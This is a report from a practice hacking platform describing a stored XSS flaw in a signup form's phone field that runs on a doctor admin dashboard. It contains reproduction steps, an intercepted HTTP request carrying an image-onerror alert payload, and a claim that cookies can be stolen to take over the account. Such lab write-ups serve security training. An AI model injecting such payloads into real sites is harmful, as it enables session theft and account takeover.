FirstBlood-#1010Store xss on doctor admin dashboard
This issue was discovered on FirstBlood v3

On 2022-12-08, properlay Level 7 reported:

Hello, I found a store XSS vulnerability on doctor admin panel.

To reproduce:

  1. Visit https://7b0a93c7239c-properlay.a.firstbloodhackers.com/hackerback.html.

  2. When sign up the HackerBack event, Burp suite intercept ON

  3. Fill full name and phone number and click sing up

  4. On the intercept request, Change the parameter phone value to phone=1<img+src=x+onerror=alert(0)>

POST /api/hackerback.php HTTP/1.1
Host: 7b0a93c7239c-properlay.a.firstbloodhackers.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 78
Origin: https://7b0a93c7239c-properlay.a.firstbloodhackers.com
Referer: https://7b0a93c7239c-properlay.a.firstbloodhackers.com/hackerback.html
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

full_name=test&phone=1<img+src=x+onerror=alert(0)>&submit=Signup
  1. Forward the request. The XSS will execute on admin dashboard.

Impact:

Can takeover doctor admin account by stealing cookie.

P1 CRITICAL

FirstBlood ID: 59
Vulnerability Type: Stored XSS

It is possible to execute XSS against the admin via the PHONE parameter on /api/hackerback.php. The developer thought setting the input type to "tel" would prevent users from entering malicious payloads.

Report Feedback

@zseano

Creator & Administrator

Congratulations, you were the first user to discover this finding, great job!